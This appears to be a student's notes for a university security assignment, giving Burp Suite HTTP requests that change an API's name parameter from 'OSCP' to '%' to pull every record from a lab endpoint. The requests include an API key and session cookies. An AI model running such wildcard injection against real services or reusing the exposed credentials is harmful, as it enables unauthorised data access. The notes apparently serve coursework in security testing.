//step1: follow the description onhttp://assignment-code-warriors.unimelb.life/doco.php

//check detial
http://assignment-code-warriors.unimelb.life/api/store.php?name=OSCP


//step2: add api key in burpsuit
GET /api/store.php?name=OSCP HTTP/1.1
Host: assignment-code-warriors.unimelb.life
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=i7l7meapjs50kafhukhcddqj68; CSRF_token=C86ZeUHN35WopYczmj7ydXfHlWRGBmXcAlokyE3zrXtNxdwC4cacg2P9TOqvSl0j
Connection: close
apikey: f41c2b83-c6cc-11ec-95e2-0242ac110002


//step3: change OSCP to %
GET /api/store.php?name=% HTTP/1.1
Host: assignment-code-warriors.unimelb.life
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: CSRF_token=Ngne08KBKtK6n0sS1idKYJjr2B1BRGxlMXnO9K9MSmu2TrIAoGYRUW0CLSuCMg2e; PHPSESSID=4j3vt04mejtb1ad8us8gk4hoiu
Connection: close
apikey: f41c2b83-c6cc-11ec-95e2-0242ac110002